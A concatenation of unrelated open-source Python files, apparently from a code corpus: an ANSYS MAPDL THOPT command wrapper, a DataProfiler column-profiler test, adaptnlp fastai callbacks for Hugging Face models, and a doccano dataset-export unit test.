def thopt(
self,
refopt="",
reformtol="",
ntabpoints="",
tempmin="",
tempmax="",
algo="",
**kwargs,
):
"""Specifies nonlinear transient thermal solution options.
APDL Command: THOPT
Parameters
----------
refopt
Matrix reform option.
FULL - Use the full Newton-Raphson solution option (default). All subsequent input
values are ignored.
QUASI - Use a selective reform solution option based on REFORMTOL.
reformtol
Property change tolerance for Matrix Reformation (.05 default). The
thermal matrices are reformed if the maximum material property
change in an element (from the previous reform time) is greater
than the reform tolerance. Valid only when Refopt = QUASI.
ntabpoints
Number of points in Fast Material Table (64 default). Valid only
when Refopt = QUASI.
tempmin
Minimum temperature for Fast Material Table. Defaults to the
minimum temperature defined by the MPTEMP command for any material
property defined. Valid only when Refopt = QUASI.
tempmax
Maximum temperature for Fast Material Table. Defaults to the
maximum temperature defined by the MPTEMP command for any material
property defined. Valid only when Refopt = QUASI.
--
Reserved field.
algo
Specifies which solution algorithm to apply:
0 - Multipass (default).
1 - Iterative.
Notes
-----
The QUASI matrix reform option is supported by the ICCG, JCG, and
sparse solvers only (EQSLV).
For Refopt = QUASI:
Results from a restart may be different than results from a single run
because the stiffness matrices are always recreated in a restart run,
but may or may not be in a single run (depending on the behavior
resulting from the REFORMTOL setting). Additionally, results may differ
between two single runs as well, if the matrices are reformed as a
result of the REFORMTOL setting.
Midside node temperatures are not calculated if 20-node thermal solid
elements (SOLID90 or SOLID279) are used.
For more information, see Solution Algorithms Used in Transient Thermal
Analysis in the Thermal Analysis Guide.
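Examples
--------
Quasi matrix-reform option with a 5% property-change tolerance and a
128-point fast material table (illustrative values; assumes an active
``mapdl`` session):
>>> mapdl.thopt("QUASI", 0.05, 128)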
"""
command = f"THOPT,{refopt},{reformtol},{ntabpoints},{tempmin},{tempmax},{algo}"
return self.run(command, **kwargs)
|
dataprofiler/tests/profilers/test_datatype_column_profiler.py
|
gautomdas/DataProfiler
| 690 |
79549
|
from __future__ import print_function
import os
import unittest
from .test_base_column_profilers import AbstractTestColumnProfiler
from dataprofiler.profilers.column_profile_compilers import \
ColumnPrimitiveTypeProfileCompiler
test_root_path = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
class TestColumnDataTypeProfiler(AbstractTestColumnProfiler, unittest.TestCase):
column_profiler = ColumnPrimitiveTypeProfileCompiler
profile_types = ['data_type', 'statistics', 'data_type_representation']
def setUp(self):
AbstractTestColumnProfiler.setUp(self)
@classmethod
def setUpClass(cls):
super(TestColumnDataTypeProfiler, cls).setUpClass()
if __name__ == '__main__':
unittest.main()
|
adaptnlp/callback.py
|
chsafouane/adaptnlp
| 410 |
79550
|
# AUTOGENERATED! DO NOT EDIT! File to edit: nbs/01_callback.ipynb (unless otherwise specified).
__all__ = ['GatherInputsCallback', 'SetInputsCallback', 'GeneratorCallback']
# Cell
from fastcore.basics import store_attr
from fastcore.meta import delegates
from fastai.callback.core import Callback, CancelBatchException
from transformers import PreTrainedModel
# Cell
class GatherInputsCallback(Callback):
"""
Prepares basic input dictionary for HuggingFace Transformers
This `Callback` generates a very basic dictionary consisting of `input_ids`,
`attention_masks`, and `token_type_ids`, and saves it to the attribute `self.learn.inputs`.
If further data is expected or needed from the batch, the additional Callback(s) should have
an order of -2
"""
order = -3
def before_validate(self):
"""
Sets the number of inputs in `self.dls`
"""
x = self.dl.one_batch()
self.learn.dls.n_inp = len(x)
def before_batch(self):
"""
Turns `self.xb` from a tuple into a dictionary of either
`{"input_ids", "attention_mask", "token_type_ids"}`
or
`{"input_ids", "attention_mask"}`
"""
inputs = {
"input_ids":self.learn.xb[0],
"attention_mask":self.learn.xb[1]
}
if len(self.learn.xb) > 2:
inputs["token_type_ids"] = self.learn.xb[2]
self.learn.inputs = inputs
# Cell
class SetInputsCallback(Callback):
"""
Callback which runs after `GatherInputsCallback` that sets `self.learn.xb`
"""
order = -1
def __init__(
self,
as_dict=False # Whether to leave `self.xb` as a dictionary of values
): store_attr()
def before_batch(self):
"""
Set `self.learn.xb` to `self.learn.inputs.values()`
"""
if not self.as_dict:
self.learn.xb = list(self.learn.inputs.values())
else:
self.learn.xb = self.learn.inputs
# Cell
class GeneratorCallback(Callback):
"""
Callback used for models that utilize `self.model.generate`
"""
@delegates(PreTrainedModel.generate)
def __init__(
self,
num_beams:int, # Number of beams for beam search
min_length:int, # Minimal length of the sequence generated
max_length:int, # Maximum length of the sequence generated
early_stopping:bool, # Whether to do early stopping
**kwargs
):
store_attr()
self.kwargs = kwargs
def before_batch(self):
"""
Run model-specific inference
"""
pred = self.learn.model.generate(
input_ids = self.xb['input_ids'],
attention_mask = self.xb['attention_mask'],
num_beams = self.num_beams,
min_length = self.min_length,
max_length = self.max_length,
early_stopping = self.early_stopping,
**self.kwargs
)
self.learn.pred = pred
raise CancelBatchException # skip original model inference
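# Illustrative composition (not part of the original module): a fastai
# `Learner` wrapping a Hugging Face seq2seq model could, hypothetically,
# attach these callbacks roughly as follows; `learn` is assumed to already
# exist and is not defined here.
#
# learn.add_cbs([
#     GatherInputsCallback(),
#     SetInputsCallback(as_dict=True),
#     GeneratorCallback(num_beams=4, min_length=10, max_length=50,
#                       early_stopping=True),
# ])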
|
backend/data_export/tests/test_dataset.py
|
arcada-uas/doccano
| 2,082 |
79570
|
import unittest
from unittest.mock import MagicMock
import pandas as pd
from pandas.testing import assert_frame_equal
from data_export.pipeline.dataset import Dataset
class TestDataset(unittest.TestCase):
def setUp(self):
example = MagicMock()
example.to_dict.return_value = {"data": "example"}
self.examples = MagicMock()
self.examples.__iter__.return_value = [example]
label = MagicMock()
label.find_by.return_value = {"labels": ["label"]}
self.labels = MagicMock()
self.labels.__iter__.return_value = [label]
def test_to_dataframe(self):
dataset = Dataset(self.examples, self.labels)
df = dataset.to_dataframe()
expected = pd.DataFrame([{"data": "example", "labels": ["label"]}])
assert_frame_equal(df, expected)
|